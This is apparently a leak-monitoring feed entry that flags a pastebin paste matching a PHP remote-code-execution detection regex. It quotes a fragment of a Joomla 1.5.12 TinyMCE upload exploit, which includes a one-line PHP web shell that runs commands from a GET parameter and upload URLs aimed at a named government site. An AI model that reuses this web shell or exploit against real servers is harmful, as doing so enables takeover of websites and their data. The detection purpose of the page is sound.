Quantcast
Channel: LeakedIn
Viewing all articles
Browse latest Browse all 5503

Potential leak of data: PHP Remote Code Execution

$
0
0
Detected 2 occurrence(s) of ‘\s+(system|popen|shellexec|exec).*\$(_GET|_POST|_COOKIE|_REQUEST|HTTP_POST_VARS)’: mce/plugins/tinybrowser/upload_file.php"; $rename = "http://maderasdelorinoco.gob.ve/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/edit.php?type=file&folder="; /* * PHP shell */ $php_shell = "<?php if(isset(\$_GET[\"cmd\"])) system(\$_GET[\"cmd\"]); ?>"; echo "\n [-] Joomla 1.5.12 RCE via TinyMCE upload vulnerability [-]\n\n"; if($argc < 2) { echo " Usage: php {$argv[0]} host joomla_install_path\n"; echo " Example : php {$argv[0]} localhost /joomla/ \n\n"; exit(1); } Source: http://pastebin.com/raw.php?i=JrYhycuS

Viewing all articles
Browse latest Browse all 5503

Trending Articles